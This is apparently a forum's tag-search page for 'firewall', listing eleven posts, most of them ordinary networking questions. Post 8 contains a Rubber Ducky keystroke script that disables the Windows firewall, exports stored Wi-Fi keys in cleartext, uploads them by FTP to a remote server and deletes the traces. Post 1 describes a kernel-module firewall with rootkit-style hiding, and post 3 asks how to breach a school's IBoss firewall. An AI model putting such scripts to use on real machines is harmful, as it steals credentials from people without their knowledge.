Showing results for tags 'firewall'.

Found 11 results

  1. HiddenWall is a Linux kernel module generator for custom rules with netfilter (block ports, hidden mode, rootkit functions, etc.). The motivation: in a bad situation, an attacker can take down your iptables/ufw... but if you have HiddenWall, the attacker will not find the hidden kernel module that blocks external access, because it has a hook to netfilter in kernel land (think of it as a second layer for the firewall). My initial purpose for this project was to protect my personal server; now it is to protect the machines of my friends. When I say "friends", I mean people who don't know how to write low-level code. Using HiddenWall you can generate a custom kernel module for your firewall configuration. A low-level programmer can write new templates for modules, etc.

     First step, understand before you run

     Verify that the kernel version is 3.x, 4.x or 5.x:
         uname -r
     Clone the repository:
         git clone https://github.com/CoolerVoid/HiddenWall
     Enter the folder:
         cd HiddenWall/module_generator
     Edit your firewall rules in rules/server.yaml; the Python scripts use that file to generate a new firewall module.
         $ cat rules/server.yaml
         module_name: SandWall
         public_ports: 80,443,53
         unhide_key: AbraKadabra
         hide_key: Shazam
         fake_device_name: usb14
         liberate_in_2_out: True
         whitelist:
         - machine:
             ip:
             open_ports: 22,21
         - machine:
             ip:
             open_ports: 22
     If you want to study the static code used for generation, look at the content of the directory "templates".

     Second step, generate your module

     If you want to generate a kernel module following your YAML file of rules, use this command:
         $ python3 WallGen.py --template template/hiddenwall.c -r rules/server.yaml
     This generates a generic module with the rules of server.yaml. If you want to use another template you can use "wall.c"; the template module "hiddenwall" has the option to run in hidden mode (it is not visible to "# lsmod", for example).

     Third step, install your module

     To test the module:
         # cd output; make clean; make
         # insmod SandWall.ko
     The YAML rule used to generate the module is simple: drop all out-to-in packets, accept ports 80, 443 and 53. The machine 192*.181 can connect to ports 22 and 21... if you use nmap at localhost/ you can view the open ports... because the rule liberate_in_2_out is true. The password to turn the firewall visible is "AbraKadabra". The password to turn the firewall invisible is "Shazam". You need to send the password to your fake device "usb14". To unload the module, you need to make it visible to the "lsmod" command...
         # echo "AbraKadabra" > /dev/usb14
         # lsmod | grep SandWall
         # rmmod SandWall

     Random notes

     Tested on Ubuntu 16 and Fedora 29 with kernels "3.x", "4.x" and "5.x".

     TODO

     Support for IPv6. Macro to select the interface (to use multiple modes for each interface). Option to remove the last logs when turning on hide mode. Option to search for and remove other toolkits... Code generator to BFP...

     References

     Wikipedia Netfilter https://en.wikipedia.org/wiki/Netfilter
     Linux Device Drivers http://lwn.net/Kernel/LDD3/
     M0nad's Diamorphine https://github.com/m0nad/Diamorphine/
  2. Hi, can anyone recommend a GUI-based firewall monitoring tool for Raspbian, please?
  3. Hello, I am new to this forum and I work for a school district as a pen tester. We use a firewall called IBoss and we had a student crack it to gain access to otherwise restricted sites, and I am not able to recreate how the student worked around the firewall. I need some help on creating a breach within the IBoss system. Thank you, Clarence
  4. Anybody use Snort? I am consulting for a business that has limited resources, so I am looking to cut some costs, as most of the funds were spent upgrading their end-user hardware and migrating necessary software to a cloud solution. They are currently using their firewall to do everything: routing, DHCP, IDS, VPN and overall network management. A lot of those features require yearly licences, while I have already managed to repurpose some of their switches for internal routing and network management and used one of the leftover servers for a DHCP server. I wanted to see if Snort would be a viable solution for IDS so that they could have active live alerts, not just someone checking the firewall. Thanks
  5. What are some recommended resources for IP blocklists? I just want to block pretty much everyone. The government, big companies, botnets, hackers, etc. Do you have your own blocklist you would like to share?
  6. Hi all, I'm thinking about upgrading my home network with an inline IDS and/or firewall between my modem and router. My home network currently resembles this: If I build a box with a couple of Gigabit network cards and add it into the network at the place shown, and install something like pfSense onto it, can I get the box to just function in a bridge mode between the modem and router? Many thanks all!
  7. Hey! I'm trying to use 2 pineapples to provide wifi for two storeys of the same building (office with roundabout 10-15 persons each). I got them configured, they have access to the internet but they don't relay it to their clients (be it eth or wifi). Any clients connected to a pineapple can ping the pineapple only. Traceroutes fail right after the pineapple (tried this for Macs and Win7/8 machines, also for an Android phone, except for the traceroute part of course).

     - I tried to correct the config files (/etc/config/ network, dhcp, wireless, firewall)
     - I tried to leave the firewall wide open (which isn't installed on a pineapple, if I understand correctly)
     - I flushed the iptables (iptables -F)
     - I tried setting the route: route add default gw

     to no avail, even with a couple of restarts (barring the iptables, which would be reestablished if I understood correctly).

     I tried a search, but except for this post of computerchris I couldn't find anything. As I don't have any Linux machines at hand I couldn't start the wp4.sh file from anywhere, and the first of the iptables commands in the quote would give me the error that I may not use the -s parameter twice.

     The pineapples are connected to a switch (Netgear) via ethernet, which in turn leads to the router ( - which also functions as a DSL modem (Germany - Fritz Box 7390) and a wifi router (I wanted to install the pineapples to give the network a cleaner layout and have the DSL modem not do everything - well, and also to play around with the pineapples whenever there is a chance ^_^). They can ping to anywhere on the internet, as well as to the DSL modem. Also they can be reached from any station connected to the DSL modem (being the wifi router as well) or connected to the pineapple itself.

     Because I want to use the pineapples with only the ethernet cable, I switched the devices in the network config file so that wan would lie on the PoE-enabled port. The pineapples are supposed to connect to the DSL router via DHCP and distribute via wifi and the former wan port; (SVR6) and (SVR5).

     I just received the devices and I tried all day to get them running. I am quite desperate. They run on 3.0 (SVR5) and 2.8.1 (SVR6 - I had to flash one of them as it almost bricked and then would not react to any changes in the config files). Both have the exact same problem. Albeit flashing the iptables and setting the routes I only tried on one of them (SVR5).

     I will post the config files at the end of the post for one of them (SVR5) and also attach the zip files with the config folders of both: SVR5.zip SVR6.zip

     Here is a little map:

         Internet
            |
         DSL-Modem
            |
          Switch
          |     \
         SVR5   SVR6
          |       \
         clients  clients

     I would like to configure them correctly
     - in order to have the clients get through to the internet
     - to have a deeper understanding of the inner workings of OpenWrt and the pineapples

     I don't get anywhere on my own anymore. Please help and inform me about my mistakes. I am eager to learn =D

     contents of /etc/config/ network wireless dhcp firewall
  8. OK, rebuild of my first script. It would not export cleartext passwords without administrator access, and the firewall was also giving me fits. Sooooooo, the first ctrl-shift enter gets a cmd shell with administrative access (you need to compile with version 2.2 of duck encoder - props to Dnucna). The first string then disables the firewall, then the rest of the code works fine. You may want to tweak the delay after the ftp session depending on upload speed..... enjoy. Please let me know if you have ideas for additions/improvements. DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING netsh firewall set opmode mode=disable ENTER DELAY 400 STRING netsh wlan export profile key=clear ENTER DELAY 400 STRING cd %USERPROFILE% ENTER DELAY 400 STRING ftp -i ftp server ENTER DELAY 400 STRING username ENTER DELAY 400 STRING password ENTER DELAY 600 STRING prompt ENTER DELAY 400 STRING prompt ENTER DELAY 400 STRING MPUT *.xml ENTER DELAY 4000 STRING bye ENTER DELAY 400 STRING del *.xml ENTER DELAY 200 STRING netsh firewall set opmode mode=enable ENTER DELAY 400 ALT SPACE STRING c
  9. I'm trying to set up my pineapple MK4 (running 2.7.0) to be able to filter certain TCP ports on a bridge interface. I am able to do this same thing on my laptop running Ubuntu 12.04 between two interface cards, but I can't seem to get it to work on the MK4. I realize the below steps are not persistent across a reboot, as this is only a POC I am trying to achieve.

     The steps I take on the MK4:

     - I edit /etc/sysctl.conf and reboot the MK4 (I read this in another forum and have tried it both ways, with '1' or '0' - default)
         net.bride.bridge-nf-call-iptables=1
     - I create a new bridge and add eth1
         brctl addbr br0
         ifconfig eth1 promisc up
         brctl addif br0 eth1
     - I delete the pineapple's existing bridge and add eth0 to the new bridge
         ifconfig br-lan down
         ifconfig eth0 down
         brctl delbr br-lan
         ifconfig eth0 promisc up
         brctl addif br0 eth0
     - I bring up the bridge
         ifconfig br0 netmask up

     At this point traffic goes through the bridge between eth0 and eth1 (which is good), but I want to be able to filter the forwarding traffic via iptables.

     - so I add this to the iptables
       flush them
         iptables -X
         iptables -F
       add filter
         iptables -A FORWARD -p tcp --dport 80 -j DROP

     but it still continues to forward port 80 (or any port I put in). I have also tried
         iptables -A FORWARD -j DROP
     and it still continues to forward everything. If I do this on INPUT or OUTPUT it does work as I expect it to.

     What am I missing? I understand that a bridge is layer 2 while iptables is layer 3, but I have read that "bridge-nf-call" (I have no idea what I am talking about) takes care of this. Do I need to install additional iptables packages maybe? Thanks in advance for any advice you may have. magoo
  10. I'm trying to "hide" the fact that SSH + deluge are running when port scanned. I think my options are: I can firewall the server, open the SSH port and keep it visible, and get to deluge by going to localhost:8112 after a ssh -D $someport. Or, I can use knockknock and hide SSH and Deluge but need to keep 1 outbound + 1 inbound TCP port open for deluge xfers (or use knockknock-proxy).

      - Server(s) running Ubuntu 10.10 --> 12.04
      - knockknock --> http://www.thoughtcr...are/knockknock/
      - SSH
      - deluge-torrent.org/

      1. Has anyone on the forums attempted to set up port knocking with knockknock before?
      2. Am I correct in assuming that it would be wise to NOT use UFW to configure my firewall and instead rely strictly on iptables? I believe this to be true because knockknock will need custom iptables entries to work.
      3. SSH seems simple to think through. Knock on one port and connect. All inbound + outbound traffic flows over one port after the connection is established -- easy enough.
      4. I threw in an application like Deluge because I can't get my head around the firewall logic. "deluged" runs as a local daemon on the server. Once a torrent is added it needs two ports to operate (1 inbound + 1 outbound). "deluge-web --fork" is a web GUI to add/remove torrents. It runs on a separate port (8112 by default), for a total of three. My best guess is to create a knockknock rule for the web GUI (8112) and leave deluge's inbound (5000) + outbound (6000) ports open, plus a standard SSH knockknock rule. OR should I use the knockknock-proxy?

      Can anyone contribute/comment on how this should be set up? THANKS
  11. How can I make the iptables entries into a startup script for jasager? How do I create 2 scripts, one for WAN port routing and 1 for Android USB tethering?

          iptables -A FORWARD -i eth1 -o wlan0 -s -m state --state NEW -j ACCEPT
          iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
          iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE

          iptables -A FORWARD -s -o usb0 -j ACCEPT
          iptables -A FORWARD -d -m state --state ESTABLISHED,RELATED -i usb0 -j ACCEPT
          iptables -t nat -A POSTROUTING -s -o usb0 -j MASQUERADE

      Thanks